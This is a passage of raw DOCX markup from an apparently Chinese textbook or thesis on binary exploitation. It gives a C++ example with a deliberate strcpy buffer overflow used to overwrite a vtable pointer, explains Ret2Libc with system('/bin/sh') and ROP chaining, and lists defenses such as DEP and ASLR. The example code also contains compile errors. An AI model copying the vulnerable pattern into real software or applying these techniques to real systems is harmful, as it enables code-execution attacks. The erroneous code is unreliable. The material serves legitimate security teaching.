    <w:p w14:paraId="4A0DDD6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    virtual void base1_fun1() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F275E8"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    virtual void base1_fun2() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A20A7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23775DA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354FB56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class Derive1 : public Base1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE973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552CFE2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public:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F668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    int derive1_1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD17A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    int derive1_2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870DD2C"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2CE1BEB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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(int argc, chart** argv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E7B9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22B885DC"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Derive1 a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF40458"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buff[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57590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Base1 *p=a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FEDF5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strcpy(buff,argv[1]);  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC0F2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p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;base1_func1();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6E74F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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789A568"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069B6EC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Derive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象内存对应的结构图如下所示，_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_vfptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员指向一个存放了两个函数指针的表格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5CCFE"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570F353B" wp14:editId="7D79EA67">
            <wp:extent cx="3197596" cy="1034426"/>
            <wp:effectExtent l="0" t="0" r="3175"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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3216046" cy="1040395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5FA0C" w14:textId="48D9122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.2</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚函数表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61168D0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当对象可以被缓冲区溢出漏洞覆盖时，对象内的_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_vfptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就可以被覆盖，将_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_vfptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>覆盖为一个攻击者可控的表格结构，再将表格中填入shellcode的起始地址，当对象调用虚函数时，程序就会进入到shellcode中运行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D2A3F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492266AE" wp14:editId="47CA0564">
            <wp:extent cx="4809506" cy="3719753"/>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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4829829" cy="3735471"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA9186" w14:textId="1CBD2AB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.2</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚函数指针覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D84F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具体过程如上图所示，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_v</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>覆盖为栈中的buff的地址，那么在调用虚函数时，则会将buff中的内存视为_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_vtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，从里面寻找虚函数的地址，那么将buff中的对应位置覆盖为恶意代码地址后，当虚函数被调用时，实际上调用了恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0892D5EB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00253195" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00253195">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2.7 漏洞利用与防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04255837"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2.7.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞利用途径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B5E02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当通过程序分析和漏洞挖掘等技术将程序的漏洞找出来后，需要通过一定的手段才能利用漏洞来实现攻击者的攻击目的。一些常见的攻击方法：代码植入栈、Ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Libc（返回到库函数）、ROP（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>面向返回的编程</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）、DOP（面向数据的编程）。既然存在这么多种攻击方式，为了保护程序的安全，研究者们自然也提出了很多种防御对策来防御这些攻击。比如：GS防御，可以防止覆盖返回地址；DEP防御，可以不让栈中的数据作为代码来执行；SafeSEH，可以察觉对SEH的恶意修改；ALSR随机化机制，可以对除了代码段和数据段的其它所有段进行地址随机化；SEHOP（SEH覆盖保护机制），可以检测SEH的完整性。下面将分别介绍这些攻击方式和防御机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07658F37"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2.7.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ret</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33F04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Ret2Libc是利用程序中原本的gadgets来达到攻击目的，利用是动态链接库中的一些能够让攻击者控制目标主机的整个函数，比如以Linux环境为例，libc动态链接库中的system函数、exec系列函数一般会成功攻击者利用的目标。如果攻击者能够让程序执行system</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(“/bin/sh”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数，那么就会获得一个能够控制目标的终端窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099659B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对栈空间进行覆盖时，需要将原本的返回地址覆盖为system函数的地址，然后将后续的4个字节任意赋值或赋值为exit函数的地址（目的是让程序正常退出，这4个字节是system函数的返回地址），EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处就是system函数的参数，将其覆盖为“/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh”字符串的地址，程序就会执行s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ystem(“/bin/sh”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了。“/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh”字符串一般可以在可执行程序的数据区寻找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDA876"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3DA18D" wp14:editId="536B57FE">
            <wp:extent cx="3073400" cy="3015894"/>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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3082824" cy="3025142"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="093499ED" w14:textId="7FC0B950"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.2</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Libc攻击的栈空间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201D185"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2.7.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFAC8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ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Libc太依赖于程序中原本的函数的功能，ROP可以通过将程序中各处的代码片段通过RET指令链接到一块儿，组成攻击者想要实现的功能。栈中覆盖的返回地址一般为函数快要结束时的代码的地址。只要精心构造操作数和返回地址，就可以达到目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B0013"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581B86D6" wp14:editId="3310983C">
            <wp:extent cx="3821373" cy="2412628"/>
            <wp:effectExtent l="0" t="0" r="8255" b="698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32677" cy="2419765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DEBFDA" w14:textId="477102EF"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.2</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ROP攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1672FE3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如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.25</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的示例，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xb880000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所在内存处本来是函数正常的返回地址，现在覆盖为了目标指令片段的地址；当函数执行ret指令后跳到了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xb880000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处执行pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eax，取出栈中的0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>00000001</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>赋值到eax中；执行ret返回到0xb8800010；执行pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
